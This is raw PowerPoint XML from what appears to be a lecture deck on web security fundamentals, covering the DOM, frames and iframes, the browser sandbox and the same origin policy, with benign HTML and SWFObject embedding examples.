              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>"  type="text /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site/com/theme.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>"  /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  (flash):       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>[using    swfobject.js   script ]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;  	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> so = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>SWFObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/flash.swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>', …); 			 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>so.addParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>allowscriptaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>',  ‘always'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>		 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>so.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>flashdiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>');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  <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>	&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13373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534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Object-oriented interface used to read and write docs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>web page in HTML is structured data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DOM provides representation of this hierarchy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Examples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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ]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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  document.write(document.referrer)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Also Browser Object Model (BOM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>window, document, frames[], history, location, navigator (type and version of browser)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4C08035-04FD-45B8-A3AA-04C957743337}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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Running Remote Code is Risky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1946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Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Compromise your machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Install malware rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Transact on your accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Read your information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Steal passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Read your email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19461" name="Picture 7" descr="ser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905000"/>
            <a:ext cx="24812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Frame and iFrame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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smtClean="0"/>
              <a:t>Window may contain frames from different sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Frame: rigid division as part of frameset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>iFrame: floating inline frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>iFrame example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r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Why use frames?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Delegate screen area to content from another source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Browser provides isolation based on frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Parent may work even if frame is broken</a:t>
            </a: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990600" y="3352800"/>
            <a:ext cx="68580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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="hello.html" width=450 height=100&gt;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If you can see this, your browser doesn't understand IFRAME.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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/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84F1C42-AC66-4039-99E4-846C0801E8B8}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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Browser Sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2048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Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Run remote web applications safely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Limited access to OS, network, and browser data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Isolate sites in different security contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Browser manages resources, like an OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20485" name="Picture 6" descr="MCj029790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914400"/>
            <a:ext cx="2819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ser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6713" y="279400"/>
            <a:ext cx="1284287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Analogy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Text Placeholder 6" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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4040188" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Operating system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2011363"/>
            <a:ext cx="4040188" cy="3951287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>System calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Principals: Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Discretionary access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Root exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Text Placeholder 7" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797425" y="1371600"/>
            <a:ext cx="4041775" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="Content Placeholder 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797425" y="2011363"/>
            <a:ext cx="4041775" cy="3951287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Document object model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principals: “Origins”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mandatory access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cache history attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…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Policy Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3277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Safe to visit an evil web site</a:t>
            </a:r>
          </a:p>
          <a:p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smtClean="0"/>
              <a:t>Safe to visit two pages at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>	distinguishes them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Allow safe delegation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32772" name="Picture 3" descr="a.co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3100" y="2070100"/>
            <a:ext cx="18542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a.co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943350"/>
            <a:ext cx="18542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4" descr="b.co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0200" y="3943350"/>
            <a:ext cx="18542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6" descr="ifram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3900" y="5410200"/>
            <a:ext cx="18542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sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Same Origin Policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Content Placeholder 24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 = protocol://host:port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Full access to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Full network access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Read/write DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Storage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Assumptions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166916" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5672138" y="4183063"/>
            <a:ext cx="2057400" cy="1724025"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"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4275" y="2403475"/>
            <a:ext cx="936625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1088" y="4416425"/>
            <a:ext cx="11430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6919" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5891212" y="3486151"/>
            <a:ext cx="1668463" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37620"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901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sp>
        <p:nvSpPr>
          <p:cNvPr id="33800" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6357938" y="2125663"/>
            <a:ext cx="787400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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33801" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5878513" y="5500688"/>
            <a:ext cx="1763712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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t> context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" i="1">
